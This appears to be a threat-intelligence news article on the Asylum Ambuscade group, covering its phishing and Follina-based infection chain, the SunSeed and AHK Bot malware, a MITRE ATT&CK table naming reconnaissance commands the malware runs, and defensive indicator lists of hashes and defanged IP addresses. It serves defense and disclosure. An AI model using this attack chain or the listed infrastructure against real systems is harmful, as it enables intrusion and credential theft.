The threat actor known as Asylum Ambuscade has been observed straddling cybercrime and cyber espionage operations since at least early 2020. In a recent analysis by ESET, it was revealed that Asylum Ambuscade is a crimeware group targeting bank customers and cryptocurrency traders in various regions, including North America and Europe. However, the group is also involved in espionage against government entities in Europe and Central Asia.

image

Asylum Ambuscade first came to light in March 2022 when Proofpoint documented its nation-state-sponsored phishing campaign targeting European governmental entities to obtain intelligence on refugee and supply movement. The primary objective of the attackers is to extract confidential information and web email credentials from official government email portals.

image

The attacks initiated by Asylum Ambuscade typically start with a spear-phishing email containing a malicious Excel spreadsheet attachment. Once opened, the attachment either exploits VBA code or the Follina vulnerability (CVE-2022-30190) to download an MSI package from a remote server.

The MSI installer deploys a downloader written in Lua called SunSeed, which retrieves an AutoHotkey-based malware known as AHK Bot from another remote server. This multi-stage approach allows the attackers to maintain persistence and evade detection.

image

Notably, Asylum Ambuscade has also been engaged in cybercrime activities, targeting over 4,500 victims worldwide since January 2022. The majority of these victims are located in North America, Asia, Africa, Europe, and South America. The group targets individuals, cryptocurrency traders, and small to medium-sized businesses (SMBs) in various sectors.

ESET researcher Matthieu Faou believes that while one aspect of the attacks is focused on stealing cryptocurrency, the targeting of SMBs is likely aimed at monetizing the access by selling it to other cybercriminal groups.

The compromise chain follows a similar pattern, with the initial intrusion vector being a rogue Google Ad or a traffic direction system (TDS) that redirects potential victims to a malicious website delivering a JavaScript file containing malware. As part of their arsenal, Asylum Ambuscade has also utilized a Node.js version of AHK Bot called NODEBOT. This variant is responsible for downloading plugins that enable the group to capture screenshots, harvest passwords, gather system information, and install additional trojans and stealers.

The similarities observed in the attack chains employed by Asylum Ambuscade in both cybercrime and espionage activities suggest that the group is primarily a cybercrime organization with some involvement in cyber espionage.

There is an additional activity cluster known as Screentime, tracked by Proofpoint under the name TA866, which targets companies in the U.S. and Germany with tailored malware to steal sensitive information. These overlaps further underline the group’s diverse operations.

“It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,” Faou said. Asylum Ambuscade’s dual-threat activities make it a notable rarity in the ever-evolving threat landscape.


MITRE ATT&CK techniques

Tactic ID Name Description
Resource Development T1583.003 Acquire Infrastructure: Virtual Private Server Asylum Ambuscade rented VPS servers.
  T1587.001 Develop Capabilities: Malware Asylum Ambuscade develops custom implants in various scripting languages.
Initial Access T1189 Drive-by Compromise Targets were redirected via a TDS to a website delivering a malicious JavaScript file.
  T1566.001 Phishing: Spearphishing Attachment Targets receive malicious Excel or Word documents.
Execution T1059.005 Command and Scripting Interpreter: Visual Basic Asylum Ambuscade has a downloader in VBS.
  T1059.006 Command and Scripting Interpreter: Python Asylum Ambuscade has a screenshotter in Python.
  T1059.007 Command and Scripting Interpreter: JavaScript Asylum Ambuscade has a downloader in JavaScript (NODEBOT).
  T1059 Command and Scripting Interpreter Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl.
  T1204.002 User Execution: Malicious File Targets needs to manually execute the malicious document or JavaScript file.
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder SunSeed persists via a LNK file in the startup folder.
Defense Evasion T1027.010 Obfuscated Files or Information: Command Obfuscation Downloaded JavaScript files are obfuscated with junk code.
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers AHKBOT passwords plugin can steal browser credentials.
Discovery T1087.002 Account Discovery: Domain Account AHKBOT domain plugin gathers information about the domain using net group.
  T1010 Application Window Discovery AHKBOT wndlist plugin lists the active windows.
  T1482 Domain Trust Discovery AHKBOT domain plugin gathers information using nltest.
  T1057 Process Discovery AHKBOT tasklist plugin lists the active processes using Select * from Win32_Process.
  T1518.001 Software Discovery: Security Software Discovery AHKBOT hardware plugin lists security software using Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct.
  T1082 System Information Discovery AHKBOT wndlist plugin gets system information using systeminfo.
  T1016 System Network Configuration Discovery AHKBOT wndlist plugin gets network configuration information using ipconfig /all.
Collection T1056.001 Input Capture: Keylogging AHKBOT keylogon records keystrokes.
  T1115 Clipboard Data AHKBOT keylogon monitors the clipboard.
  T1113 Screen Capture AHKBOT deskscreen takes screenshot.
Command and Control T1071.001 Application Layer Protocol: Web Protocols AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP.
Exfiltration T1041 Exfiltration Over C2 Channel Data is exfiltrated via the C&C channel.

Indicators of Compromise

SHA-1/IP
2B42FD41A1C8AC12221857DD2DF93164A71B95D7
D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8
57157C5D3C1BB3EB3E86B24B1F4240C867A5E94F
7DB446B95D5198330B2B25E4BA6429C57942CFC9
5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8E
C98061592DE61E34DA280AB179465580947890DE
519E388182DE055902C656B2D95CCF265A96CEAB
AC3AFD14AD1AEA9E77A84C84022B4022DF1FC88B
64F5AC9F0C6C12F2A48A1CB941847B0662734FBF
557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADF
F85B82805C6204F34DB0858E2F04DA9F620A0277
5492061DE582E71B2A5DA046536D4150F6F497F1
C554100C15ED3617EBFAAB00C983CED5FEC5DB11
AD8143DE4FC609608D8925478FD8EA3CD9A37C5D
F2948C27F044FC6FB4849332657801F78C0F7D5E
7AA23E871E796F89C465537E6ECE962412CDA636
384961E19624437EB4EB22B1BF45953D7147FB8F
7FDB9A73B3F13DBD94D392132D896A5328DACA59
3E38D54CC55A48A3377A7E6A0800B09F2E281978
7F8742778FC848A6FBCFFEC9011B477402544171
29604997030752919EA42B6D6CEE8D3AE28F527E
7A78AF75841C2A8D8A5929C214F08EB92739E9CB
441369397D0F8DB755282739A05CB4CF52113C40
117ECFA95BE19D5CF135A27AED786C98EC8CE50B
D24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3
95EDC096000C5B8DA7C8F93867F736928EA32575
62FA77DAEF21772D599F2DC17DBBA0906B51F2D9
A9E3ACFE029E3A80372C0BB6B7C500531D09EDBE
EE1CFEDD75CBA9028904C759740725E855AA46B5
5.39.222[.]150
5.44.42[.]27
5.230.68[.]137
5.230.71[.]166
5.230.72[.]38
5.230.72[.]148
5.230.73[.]57
5.230.73[.]63
5.230.73[.]241
5.230.73[.]247
5.230.73[.]248
5.230.73[.]250
5.252.118[.]132
5.252.118[.]204
5.255.88[.]222
23.106.123[.]119
31.192.105[.]28
45.76.211[.]131
45.77.185[.]151
45.132.1[.]238
45.147.229[.]20
46.17.98[.]190
46.151.24[.]197
46.151.24[.]226
46.151.25[.]15
46.151.25[.]49
46.151.28[.]18
51.83.182[.]153
51.83.189[.]185
62.84.99[.]195
62.204.41[.]171
77.83.197[.]138
79.137.196[.]121
79.137.197[.]187
80.66.88[.]155
84.32.188[.]29
84.32.188[.]96
85.192.49[.]106
85.192.63[.]13
85.192.63[.]126
85.239.60[.]40
88.210.10[.]62
89.41.182[.]94
89.107.10[.]7
89.208.105[.]255
91.245.253[.]112
94.103.83[.]46
94.140.114[.]133
94.140.114[.]230
94.140.115[.]44
94.232.41[.]96
94.232.41[.]108
94.232.43[.]214
98.142.251[.]26
98.142.251[.]226
104.234.118[.]163
104.248.149[.]122
109.107.173[.]72
116.203.252[.]67
128.199.82[.]141
139.162.116[.]148
141.105.64[.]121
146.0.77[.]15
146.70.79[.]117
157.254.194[.]225
157.254.194[.]238
172.64.80[.]1
172.86.75[.]49
172.104.94[.]104
172.105.235[.]94
172.105.253[.]139
176.124.214[.]229
176.124.217[.]20
185.70.184[.]44
185.82.126[.]133
185.123.53[.]49
185.150.117[.]122
185.163.45[.]221
193.109.69[.]52
193.142.59[.]152
193.142.59[.]169
194.180.174[.]51
195.2.81[.]70
195.133.196[.]230
212.113.106[.]27
212.113.116[.]147
212.118.43[.]231
213.109.192[.]230